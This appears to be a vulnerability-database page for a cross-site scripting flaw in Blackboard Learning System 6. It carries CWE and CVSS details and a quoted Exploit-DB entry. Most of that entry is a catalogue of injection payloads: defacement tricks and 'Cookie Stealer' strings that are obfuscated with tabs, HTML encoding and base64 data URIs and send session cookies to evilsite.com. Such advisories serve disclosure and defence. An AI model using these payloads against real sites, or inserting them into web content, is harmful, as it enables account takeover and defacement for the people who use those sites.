Related Weaknesses
CWE-ID |
Weakness Name |
Source |
CWE-79 |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
|
Metrics
Metric |
Score |
Severity |
CVSS Vector |
Source |
V2 |
4.3 |
|
AV:N/AC:M/Au:N/C:N/I:P/A:N |
[email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 28324
Publication date : 2006-08-23 22:00 +00:00
Author : proton
EDB Verified : Yes
source: https://www.securityfocus.com/bid/19308/info
Blackboard products are prone to multiple HTML-injection vulnerabilities because the software fails to properly sanitize user-supplied input before using it in dynamically generated content.
Attacker-supplied HTML and script code would execute in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
Blackboard Learning System (Release 6) and Blackboard Learning and Community Portal Suite (Release 6 build 6.2.3.23) are vulnerable; other version may also be affected.
Reports indicate this issue has been addressed in versions 7.0 and 7.1, but Symantec has not confirmed this.
UPDATE (June 14, 2007): Reports indicate that Blackboard Academic Suite - Vista 4 is also vulnerable.
Defacement (FrameBuster)
-------------------------
<meta http-equiv="refresh"
content="15;url= http://evilsite.com">
Defacement (FrameBuster)
-------------------------
<iframe src=" http://evilsite.com" width=100
height=100></iframe>
Defacement (IE ONLY)
-------------------------
<img src=vbscript:document.write("defaced_by_insane_script_kiddies")>
Defacement (IE ONLY)
-------------------------
<link rel="stylesheet"
href=vbscript:document.write("defaced_by_insane_script_kiddies")>
Cookie Stealer (IE ONLY)
-------------------------
<img
src="vbscript:wintest=window.open(%22http://evilsite.com + document.cookie)"style=visibility:hidden/>
<img src="vbscript:window.focus ()"style=visibility:hidden/>
<img src="vbscript: window.close()"style=visibility:hidden/>
Cookie Stealer (IE ONLY)
-------------------------
<link rel="stylesheet"
href="vbscript:wintest=window.open(%22http://evilsite.com+document.cookie)">
Cookie Stealer (Encoded Tab - IE ONLY)
-------------------------
<img
src="jav	ascript: document.images[1].src=%22http://evilsite.com+document.cookie;"<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
Cookie Stealer (html encoded - IE ONLY)
-------------------------
<img
src='javascripdocument.images[1].s
rc=" http://evilsite.com"+document.cookie;'<img
src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
Cookie Stealer (tabs - IE ONLY)
-------------------------
<img src="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;"style=visibility:hidden/>
Cookie Stealer (body tag with tabs - IE ONLY)
-------------------------
<body background="jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;">
Cookie Stealer (div tag with tabs - IE ONLY)
-------------------------
<div style="background-image: url(jav
ascript:document.images[1].src=%22http://evilsite.com+document.cookie;)">
Cookie Stealer (firefox)
-------------------------
<META HTTP-EQUIV="refresh"
CONTENT="0;url=data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">
Cookie Stealer (firefox - click to work)
-------------------------
<a
href="data:text/html;base64,PHNjcmlwdCBzcmM9Imh0dHA6Ly9ldmlsc2l0ZS5jb20vY29va2llLmpzIj48L3NjcmlwdD4=">hmmm</a>
Products Mentioned
Configuraton 0
Blackboard>>Blackboard >> Version 6.0
Blackboard>>Blackboard_learning_and_community_portal_suite >> Version 6.0
Blackboard>>Blackboard_learning_and_community_portal_suite >> Version 6.2.3.23
Blackboard>>Vista >> Version 4
References